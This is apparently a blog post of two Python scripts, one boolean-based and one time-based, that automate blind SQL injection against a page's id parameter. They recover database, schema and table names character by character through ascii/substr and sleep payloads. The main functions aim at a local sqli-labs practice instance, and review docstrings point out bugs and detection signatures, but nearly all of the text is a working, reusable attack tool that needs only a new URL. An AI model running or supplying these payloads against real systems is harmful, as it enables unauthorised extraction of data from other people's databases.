sql盲注脚本--python

1.布尔盲注--方便以后修改,难点仅仅在于使用二分法求name

# 1.布尔盲注
# 页面有不同的响应word1,word2
# 可猜解数据库长度、个数、名字、表个数、表长度、名字、字段、
# 长度:length,order by
# 个数:count
# 名字:ascii,substr
import requests
import time
from math import ceil
class SqlInject(object):
    """Boolean-based blind SQL injection prober.

    Works against a page whose body contains one marker (``word1``) when an
    injected condition evaluates true and another (``word2``) when it does
    not.  Every probe is a GET to ``url`` with the condition appended to the
    ``id`` query parameter.  Lengths and counts are found by linear search
    over 1..19; names are recovered one character at a time by narrowing the
    printable-ASCII range 33..126 with ``<`` / ``>`` / ``=`` probes.

    Each recovered character therefore costs several requests whose query
    string carries ``ascii(substr(...))`` comparisons.  That per-request
    pattern and the request volume are what server-side logging and WAF
    rules key on; parameterizing the vulnerable query removes the condition
    entirely.

    Class attributes:
        headers: sent on every request.  NOTE(review): the dict key is
            literally ``"headers"``, so the browser string goes out as a
            header named ``headers``, not as ``User-Agent``.
        data: never populated in this file.  When non-empty, ``judge`` sends
            no request and returns None.
    """
    headers = {
        "headers":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
    }
    data= {}
    @classmethod
    def judge(cls,url):
        """Fetch ``url`` with the class headers and return the body as text.

        Returns None without sending anything when ``SqlInject.data`` is
        non-empty.  Callers evaluate ``self.word1 in result``, which raises
        TypeError on None, so that branch is only safe while ``data`` stays
        empty.  ``requests`` errors (the 5 s timeout, connection failures)
        propagate to the caller.
        """
        if bool(SqlInject.data):
            result = None
            # print(result)
        else:
            result = requests.get(url=url,headers=SqlInject.headers,timeout=5).text
            return result
    def __init__(self,url,word1,word2):
        """Store the target URL and the two response markers.

        Args:
            url: base page URL; payloads beginning with ``?id=`` are appended
                to it verbatim.
            word1: substring whose presence in the body marks a true condition.
            word2: substring for a false condition; stored but not read by any
                method in this file.
        """
        self.url = url
        self.word1=word1
        self.word2=word2
    # A response containing word1 means the injected condition evaluated true.
    def get_Current_Db_Len(self):
        """Return the length of the current database name, or None.

        One request per candidate length 1..19.  If nothing matches the
        function falls off the loop and returns None; the name-recovery
        methods compare that against ``TempLen`` and then never match.
        """
        for i in range(1,20):
            payload = "?id=1%27+and+(length(database())={})--+".format(i)
            final_payload=self.url+payload
            result = SqlInject.judge(final_payload)
            if self.word1 in result:
                print("database len:"+str(i)+"\n")
                return i
    # Length of the schema name at offset Db_number in information_schema.schemata.
    def get_All_Db_Len(self,Db_number):
        """Return the length of the ``Db_number``-th schema name (0-based), or None.

        Same linear search over 1..19 as ``get_Current_Db_Len``.
        """
        for i in range(1,20):
            payload = "?id=1%27+and+(select+((select+length(concat(schema_name))+from+information_schema.schemata+limit+{},1)={}))--+".format(Db_number,i)
            final_payload=self.url+payload
            result = SqlInject.judge(final_payload)
            if self.word1 in result:
                print("Database_len:"+str(i)+"\n")
                return i
    def get_All_Db_Number(self):
        """Return the number of schemas in information_schema.schemata (1..19), or None."""
        for i in range(1,20):
            payload = "?id=1%27+and+(select+{}=(select count(*) from information_schema.schemata))--+".format(i)
            final_payload=self.url+payload
            result = SqlInject.judge(final_payload)
            if self.word1 in result:
                print("Db_number:"+str(i)+"\n")
                return i
    def get_Current_DbName(self):
        """Recover the current database name character by character.

        For each position the inner loop probes whether the character's
        ASCII value is below, above or equal to ``temp_top``, moving the
        bounds until the ``=`` probe hits.  Returns a list holding a single
        ``"Database_name:<name>"`` string on success, or the (possibly empty)
        list built so far if an exception was caught.

        NOTE(review): ``interval`` is first assigned inside the ``<`` branch;
        if that branch has never run when ``if interval == 0`` is reached,
        an UnboundLocalError is raised and printed by the ``except`` below.
        ``exit(...)`` raises SystemExit, which ``except Exception`` does not
        catch, so that path terminates the whole script.
        """
        table_list = []
        # Narrow the ASCII range for each character of database()
        Namelen = self.get_Current_Db_Len()
        TempLen = 0
        DbName = ""
        try:
            while(True):
                temp_bottom = 33
                temp_top = 126
                while(True):
                    # Probe: is the current character's ASCII value below temp_top?
                    payload = "?id=1%27+and+((ascii(substr(database(),{},1))) < {})--+".format(TempLen+1,temp_top)
                    final_payload=self.url+payload
                    result = SqlInject.judge(final_payload)
                    # print(final_payload)
                    if self.word1 in result:
                        temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
                        # Half the remaining gap between the bounds; reused as the step
                        # when the lower bound is moved up in the '>' branch.
                        interval = ceil((temp_top-temp_bottom)/2)
                        continue
                    # Probe: above temp_top?
                    payload = "?id=1%27+and+((ascii(substr(database(),{},1))) > {})--+".format(TempLen+1,temp_top)
                    final_payload=self.url+payload
                    result = SqlInject.judge(final_payload)
                    if self.word1 in result:
                        temp_bottom = temp_top
                        temp_top = temp_top + interval
                        continue
                    # Probe: equal to temp_top?
                    payload = "?id=1%27+and+((ascii(substr(database(),{},1))) = {})--+".format(TempLen+1,temp_top)
                    final_payload=self.url+payload
                    result = SqlInject.judge(final_payload)
                    if interval == 0:
                        exit("unknown error about variable interval")
                    if self.word1 in result:
                        DbName += chr(temp_top)
                        print("Database_name:"+DbName)
                        TempLen += 1
                        break
                if TempLen == Namelen:
                    table_list.append("Database_name:"+DbName)
                    break
        except Exception as e:
            print("Unknown error:",e)
        return table_list
    def get_All_Db_Name(self):
        """Recover every schema name listed in information_schema.schemata.

        Uses ``get_All_Db_Number`` for the count and ``get_All_Db_Len`` for
        each length, then applies the same bound-narrowing loop as
        ``get_Current_DbName`` per schema.  Returns a list of
        ``"Database_name:<name>"`` strings; a schema whose loop raised is
        simply absent from the list.  The same ``interval`` / ``exit``
        caveats as ``get_Current_DbName`` apply.
        """
        number = self.get_All_Db_Number()
        Database_list = []
        for i in range(0,number):
            Database_Name = ""
            # Narrow the ASCII range for each character of the i-th schema name
            Namelen = self.get_All_Db_Len(i)
            TempLen = 0
            try:
                while(True):
                    temp_bottom = 33
                    temp_top = 126
                    while(True):
                        # Probe: below temp_top?
                        payload = "?id=1%27+and+(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) < {})--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        result = SqlInject.judge(final_payload)
                        # print(final_payload)
                        if self.word1 in result:
                            temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
                            # Half the remaining gap; step used when the lower bound moves up.
                            interval = ceil((temp_top-temp_bottom)/2)
                            continue
                        # Probe: above temp_top?
                        payload = "?id=1%27+and+(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) > {})--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        result = SqlInject.judge(final_payload)
                        if self.word1 in result:
                            temp_bottom = temp_top
                            temp_top = temp_top + interval
                            continue
                        # Probe: equal to temp_top?
                        payload = "?id=1%27+and+(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) = {})--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        result = SqlInject.judge(final_payload)
                        if interval == 0:
                            exit("unknown error about variable interval")
                        if self.word1 in result:
                            Database_Name += chr(temp_top)
                            print("Database_name:"+Database_Name)
                            TempLen += 1
                            break
                    if TempLen == Namelen:
                        Database_list.append("Database_name:"+Database_Name)
                        break
            except Exception as e:
                print("Unknown error:",e)
        return Database_list
    def get_CurrentDb_Table_Number(self):
        """Return the number of tables in the current database (1..19), or None."""
        for i in range(1,20):
            payload = "?id=1%27+and+(select+{}=(select+count(*)+from+information_schema.tables+where+table_schema=database()))--+".format(i)
            final_payload=self.url+payload
            result = SqlInject.judge(final_payload)
            if self.word1 in result:
                print("Table_number:"+str(i)+"\n")
                return i
    def get_CurrentDb_TableName_Len(self,table_number):
        """Return the length of the ``table_number``-th table name (0-based) in the current database, or None."""
        for i in range(1,20):
            payload = "?id=1%27+and+(select+((select+length(concat(table_name))+from+information_schema.tables+where+table_schema=database()+limit+{},1)={}))--+".format(table_number,i)
            final_payload=self.url+payload
            result = SqlInject.judge(final_payload)
            if self.word1 in result:
                print("TableName_number:"+str(i)+"\n")
                return i
    def get_CurrentDb_Table_Name(self):
        """Recover every table name of the current database.

        Same structure as ``get_All_Db_Name`` with the table count and
        table-name length helpers.  Returns a list of
        ``"Table_name:<name>"`` strings; the ``interval`` / ``exit`` caveats
        from ``get_Current_DbName`` apply here too.
        """
        number = self.get_CurrentDb_Table_Number()
        table_list = []
        for i in range(0,number):
            table_name = ""
            # Narrow the ASCII range for each character of the i-th table name
            Namelen = self.get_CurrentDb_TableName_Len(i)
            TempLen = 0
            try:
                while(True):
                    temp_bottom = 33
                    temp_top = 126
                    while(True):
                        # Probe: below temp_top?
                        payload = "?id=1%27+and+(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) < {})--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        result = SqlInject.judge(final_payload)
                        # print(final_payload)
                        if self.word1 in result:
                            temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
                            # Half the remaining gap; step used when the lower bound moves up.
                            interval = ceil((temp_top-temp_bottom)/2)
                            continue
                        # Probe: above temp_top?
                        payload = "?id=1%27+and+(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) > {})--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        result = SqlInject.judge(final_payload)
                        if self.word1 in result:
                            temp_bottom = temp_top
                            temp_top = temp_top + interval
                            continue
                        # Probe: equal to temp_top?
                        payload = "?id=1%27+and+(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) = {})--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        result = SqlInject.judge(final_payload)
                        if interval == 0:
                            exit("unknown error about variable interval")
                        if self.word1 in result:
                            table_name += chr(temp_top)
                            print("Table_name:"+table_name)
                            TempLen += 1
                            break
                    if TempLen == Namelen:
                        table_list.append("Table_name:"+table_name)
                        break
            except Exception as e:
                print("Unknown error:",e)
        return table_list
def main():
    """Run table-name recovery against a local sqli-labs instance and print the wall-clock time it took.

    ``word2`` is passed through but is never read by ``SqlInject``.
    """
    url="http://127.0.0.1:8081/Less-8/"
    word1="You are in"
    word2="You are not in"
    sqli = SqlInject(url=url,word1=word1,word2=word2)
    one = float(time.time())
    print(sqli.get_CurrentDb_Table_Name())
    two = float(time.time())
    interval = two-one
    print(interval)
# Script entry point; only runs when the file is executed directly.
if __name__ == '__main__':
    main()

2.时间盲注--方便以后修改,难点仅仅在于使用二分法求name


# 1.时间盲注
# 页面有不同的响应word1,word2
# 可猜解数据库长度、个数、名字、表个数、表长度、名字、字段、
# 长度:length,order by
# 个数:count
# 名字:ascii,substr
import requests
import time
from math import ceil
class SqlInject(object):
    """Time-based blind SQL injection prober.

    Same structure as the boolean variant, but the injected condition is
    wrapped in ``if(<cond>, sleep(0.4), 0)`` (``sleep(1)`` for the schema
    count) and truth is inferred from the wall-clock time of the request:
    ``time.time()`` is sampled before and after ``judge`` and a difference
    ``>= 0.4`` (or ``>= 1``) is treated as true.  The response body is
    fetched but never inspected, so ``word1`` / ``word2`` are stored and
    unused here.

    Because only elapsed time is measured, any slow response -- network
    latency, server load, the 5 s timeout being approached -- reaches the
    threshold just like a real ``sleep``.  On the server side, the
    recurring ``sleep(...)``-bearing query strings and the resulting
    clusters of slow requests are the detectable signature.

    Class attributes:
        headers: sent on every request.  NOTE(review): the key is literally
            ``"headers"``, so the value is sent as a header named ``headers``,
            not as ``User-Agent``.
        data: never populated in this file; when non-empty ``judge`` sends
            no request and returns None.
    """
    headers = {
        "headers":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
    }
    data= {}
    @classmethod
    def judge(cls,url):
        """Fetch ``url`` with the class headers and return the body as text.

        Returns None without a request when ``SqlInject.data`` is non-empty.
        In this class the return value is assigned but never read; only the
        time the call takes matters.  ``requests`` errors (5 s timeout,
        connection failures) propagate to the caller.
        """
        if bool(SqlInject.data):
            result = None
            # print(result)
        else:
            result = requests.get(url=url,headers=SqlInject.headers,timeout=5).text
            return result
    def __init__(self,url,word1,word2):
        """Store the target URL and the two response markers.

        Args:
            url: base page URL; payloads beginning with ``?id=`` are appended
                to it verbatim.
            word1: kept for parity with the boolean variant; not read here.
            word2: kept for parity with the boolean variant; not read here.
        """
        self.url = url
        self.word1=word1
        self.word2=word2
    # In this class "true" means the request took at least as long as the injected sleep.
    def get_Current_Db_Len(self):
        """Return the length of the current database name, or None.

        One timed request per candidate length 1..19; the first request
        that takes >= 0.4 s wins.  Returns None if none does.
        """
        for i in range(1,20):
            payload = "?id=1+and+if(length(database())={},sleep(0.4),0)--+".format(i)
            final_payload=self.url+payload
            one = time.time()
            result = SqlInject.judge(final_payload)
            two = time.time()
            interval = two-one
            if interval >= 0.4:
                print("Database len:"+str(i)+"\n")
                return i
    # Length of the schema name at offset Db_number in information_schema.schemata.
    def get_All_Db_Len(self,Db_number):
        """Return the length of the ``Db_number``-th schema name (0-based), or None.

        Same timed linear search over 1..19 as ``get_Current_Db_Len``.
        """
        for i in range(1,20):
            payload = "?id=1+and+if((select+length(concat(schema_name))+from+information_schema.schemata+limit+{},1)={},sleep(0.4),0)--+".format(Db_number,i)
            final_payload=self.url+payload
            one = time.time()
            result = SqlInject.judge(final_payload)
            two = time.time()
            interval = two-one
            if interval >= 0.4:
                print("Database_len:"+str(i)+"\n")
                return i
    def get_All_Db_Number(self):
        """Return the number of schemas in information_schema.schemata (1..19), or None.

        Uses ``sleep(1)`` and a 1 s threshold instead of 0.4 s.

        NOTE(review): when the very first candidate (``i == 1``) matches, the
        method calls itself again but discards that call's return value, so
        it only repeats the probes and still returns 1.  The intent (from the
        original comment) was to guard against a latency-induced false
        positive, which this does not achieve.
        """
        for i in range(1,20):
            payload = "?id=1+and+if((select+count(*)+from+information_schema.schemata)={},sleep(1),0)--+".format(i)
            final_payload=self.url+payload
            one = time.time()
            result = SqlInject.judge(final_payload)
            two = time.time()
            interval = two-one
            if interval >= 1:
                # Intended to re-check a result that network speed may have caused;
                # the recursive call's result is not used.
                if i == 1:
                    self.get_All_Db_Number()
                print("Db_number:"+str(i)+"\n")
                return i
    def get_Current_DbName(self):
        """Recover the current database name character by character.

        Per position, timed ``<`` / ``>`` / ``=`` probes against ``temp_top``
        move the bounds until the ``=`` probe is slow.  Unlike the boolean
        variant, ``interval`` is initialised before the inner loop, so the
        ``if interval == 0`` check cannot raise UnboundLocalError; ``exit``
        still raises SystemExit, which ``except Exception`` does not catch.
        Returns a list with one ``"Database_name:<name>"`` string, or the
        list built so far if an exception was caught.
        """
        table_list = []
        # Narrow the ASCII range for each character of database()
        Namelen = self.get_Current_Db_Len()
        TempLen = 0
        DbName = ""
        try:
            while(True):
                temp_bottom = 33
                temp_top = 126
                interval = ceil((temp_top-temp_bottom)/2)
                while(True):
                    # Probe: is the current character's ASCII value below temp_top?
                    payload = "?id=1+and+if(ascii(substr(database(),{},1)) < {},sleep(0.4),0)--+".format(TempLen+1,temp_top)
                    final_payload=self.url+payload
                    one = time.time()
                    result = SqlInject.judge(final_payload)
                    two = time.time()
                    time_interval = two-one
                    if time_interval >= 0.4:
                        temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
                        # Half the remaining gap between the bounds; reused as the step
                        # when the lower bound is moved up in the '>' branch.
                        interval = ceil((temp_top-temp_bottom)/2)
                        continue
                    # Probe: above temp_top?
                    payload = "?id=1+and+if(ascii(substr(database(),{},1)) > {},sleep(0.4),0)--+".format(TempLen+1,temp_top)
                    final_payload=self.url+payload
                    one = time.time()
                    result = SqlInject.judge(final_payload)
                    two = time.time()
                    time_interval = two-one
                    if time_interval >= 0.4:
                        temp_bottom = temp_top
                        temp_top = temp_top + interval
                        continue
                    # Probe: equal to temp_top?
                    payload = "?id=1+and+if(ascii(substr(database(),{},1)) = {},sleep(0.4),0)--+".format(TempLen+1,temp_top)
                    final_payload=self.url+payload
                    one = time.time()
                    result = SqlInject.judge(final_payload)
                    two = time.time()
                    time_interval = two-one
                    if time_interval >= 0.4:
                        DbName += chr(temp_top)
                        print("Database_name:"+DbName)
                        TempLen += 1
                        break
                if TempLen == Namelen:
                    table_list.append("Database_name:"+DbName)
                    break
        except Exception as e:
            print("Unknown error:",e)
        return table_list
    def get_All_Db_Name(self):
        """Recover every schema name listed in information_schema.schemata.

        Count from ``get_All_Db_Number``, per-schema length from
        ``get_All_Db_Len``, then the same timed bound-narrowing loop as
        ``get_Current_DbName`` for each schema.  Returns a list of
        ``"Database_name:<name>"`` strings; a schema whose loop raised is
        absent from the list.
        """
        number = self.get_All_Db_Number()
        Database_list = []
        for i in range(0,number):
            Database_Name = ""
            # Narrow the ASCII range for each character of the i-th schema name
            Namelen = self.get_All_Db_Len(i)
            TempLen = 0
            try:
                while(True):
                    temp_bottom = 33
                    temp_top = 126
                    interval = ceil((temp_top-temp_bottom)/2)
                    while(True):
                        # Probe: below temp_top?
                        payload = "?id=1+and+if(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) < {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        one = time.time()
                        result = SqlInject.judge(final_payload)
                        two = time.time()
                        time_interval = two-one
                        if time_interval >= 0.4:
                            temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
                            # Half the remaining gap; step used when the lower bound moves up.
                            interval = ceil((temp_top-temp_bottom)/2)
                            continue
                        # Probe: above temp_top?
                        payload = "?id=1+and+if(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) > {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        one = time.time()
                        result = SqlInject.judge(final_payload)
                        two = time.time()
                        time_interval = two-one
                        if time_interval >= 0.4:
                            temp_bottom = temp_top
                            temp_top = temp_top + interval
                            continue
                        # Probe: equal to temp_top?
                        payload = "?id=1+and+if(ascii(substr((select schema_name from information_schema.schemata limit {},1),{},1)) = {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        one = time.time()
                        result = SqlInject.judge(final_payload)
                        two = time.time()
                        time_interval = two-one
                        if time_interval >= 0.4:
                            Database_Name += chr(temp_top)
                            print("Database_name:"+Database_Name)
                            TempLen += 1
                            break
                    if TempLen == Namelen:
                        Database_list.append("Database_name:"+Database_Name)
                        break
            except Exception as e:
                print("Unknown error:",e)
        return Database_list
    def get_CurrentDb_Table_Number(self):
        """Return the number of tables in the current database, or None.

        Searches 1..99 here (the boolean variant stops at 19); 0.4 s threshold.
        """
        for i in range(1,100):
            payload = "?id=1+and+if((select count(*) from information_schema.tables where table_schema =database()) = {},sleep(0.4),0)--+".format(i)
            final_payload=self.url+payload
            one = time.time()
            result = SqlInject.judge(final_payload)
            two = time.time()
            interval = two-one
            if interval >= 0.4:
                print("TableNumber:"+str(i)+"\n")
                return i
    def get_CurrentDb_Table_Len(self,table_number):
        """Return the length of the ``table_number``-th table name (0-based) in the current database, or None."""
        for i in range(1,20):
            payload = "?id=1+and+if((select+length(concat(table_name))+from+information_schema.tables where table_schema=database()+limit+{},1)={},sleep(0.4),0)--+".format(table_number,i)
            final_payload=self.url+payload
            one = time.time()
            result = SqlInject.judge(final_payload)
            two = time.time()
            interval = two-one
            if interval >= 0.4:
                print("TableName_len:"+str(i)+"\n")
                return i
    def get_CurrentDb_Table_Name(self):
        """Recover every table name of the current database.

        Same structure as ``get_All_Db_Name`` using the table count and
        table-name length helpers.  Returns a list of ``"Table_name:<name>"``
        strings.
        """
        number = self.get_CurrentDb_Table_Number()
        Table_list = []
        for i in range(0,number):
            Table_Name = ""
            # Narrow the ASCII range for each character of the i-th table name
            Namelen = self.get_CurrentDb_Table_Len(i)
            TempLen = 0
            try:
                while(True):
                    temp_bottom = 33
                    temp_top = 126
                    interval = ceil((temp_top-temp_bottom)/2)
                    while(True):
                        # Probe: below temp_top?
                        payload = "?id=1+and+if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) < {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        one = time.time()
                        result = SqlInject.judge(final_payload)
                        two = time.time()
                        time_interval = two-one
                        if time_interval >= 0.4:
                            temp_top = (temp_top-ceil((temp_top-temp_bottom)/2))
                            # Half the remaining gap; step used when the lower bound moves up.
                            interval = ceil((temp_top-temp_bottom)/2)
                            continue
                        # Probe: above temp_top?
                        payload = "?id=1+and+if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) > {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        one = time.time()
                        result = SqlInject.judge(final_payload)
                        two = time.time()
                        time_interval = two-one
                        if time_interval >= 0.4:
                            temp_bottom = temp_top
                            temp_top = temp_top + interval
                            continue
                        # Probe: equal to temp_top?
                        payload = "?id=1+and+if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)) = {},sleep(0.4),0)--+".format(i,TempLen+1,temp_top)
                        final_payload=self.url+payload
                        one = time.time()
                        result = SqlInject.judge(final_payload)
                        two = time.time()
                        time_interval = two-one
                        if time_interval >= 0.4:
                            Table_Name += chr(temp_top)
                            print("Table_name:"+Table_Name)
                            TempLen += 1
                            break
                    if TempLen == Namelen:
                        Table_list.append("Table_name:"+Table_Name)
                        break
            except Exception as e:
                print("Unknown error:",e)
        return Table_list


def main():
    """Run schema-name recovery against a local sqli-labs instance and print the wall-clock time it took.

    ``word1`` / ``word2`` are passed through but the time-based class never
    reads them.
    """
    url="http://127.0.0.1:8081/Less-2/"
    word1="You are in"
    word2="You are not in"
    sqli = SqlInject(url=url,word1=word1,word2=word2)
    one = float(time.time())
    print(sqli.get_All_Db_Name())
    two = float(time.time())
    interval = two-one
    print(interval)
# Script entry point; only runs when the file is executed directly.
if __name__ == '__main__':
    main()